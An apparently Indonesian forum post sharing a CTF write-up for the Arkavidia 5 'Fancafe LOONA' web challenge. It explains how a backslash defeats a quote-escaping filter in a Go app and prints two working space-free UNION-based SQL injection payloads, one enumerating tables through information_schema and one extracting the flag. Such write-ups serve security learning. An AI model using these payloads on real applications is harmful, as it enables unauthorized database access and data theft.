[Share] WRITEUP ARKAVIDIA 5: FANCAFE LOONA
#1
Diberikan website menggunakan go yang mempunyai fitur untuk mencari post dan melihat detail dari post, dengan route sebagai berikut.


[Image: Capture.PNG]

Kita juga diberikan akses terhadap source codenya yang bisa digunakan untuk memudahkan kita menemukan entrypoint eksploitasi pada aplikasi tersebut, dan ditemukan aplikasi sudah mengimplementasikan proteksi terhadap serangan SQL Injection.

[Image: Capture-1.PNG]

Namun sayang nya filter tersebut belum cukup untuk mengamankan dari serangan SQL Injection karena dapat di bypass dengan memanfaatkan backslash \ .

Quote:’ => \’
\’ => \\’

Dengan menggunakan \' kita dapat melakukan bypass terhadap filter tersebut, kemudian lakukan union dengan normal namun tanpa menggunakan spasi. Menggunakan payload berikut kita dapat memunculkan list table yang ada melalui information_schema.

Code:
TESTING\')and(1)=(0)union(select(1),1,1,1,table_name,1,(1)from(information_schema.tables)where(table_schema)!=(0x696e666f726d6174696f6e5f736368656d61))#

[Image: Capture-2.PNG]
Kemudian fetch flag dari table secret dengan payload 
Code:
TESTING\')and(1)=(0)union(select(1),1,1,1,flag,1,(1)from(secret))#

[Image: Capture-3.PNG]


Messages In This Thread
WRITEUP ARKAVIDIA 5: FANCAFE LOONA - by abdilahrf - 02-14-2019, 07:07 PM
RE: WRITEUP ARKAVIDIA 5: FANCAFE LOONA - by T-Rex - 02-24-2019, 04:36 PM




Users browsing this thread: 1 Guest(s)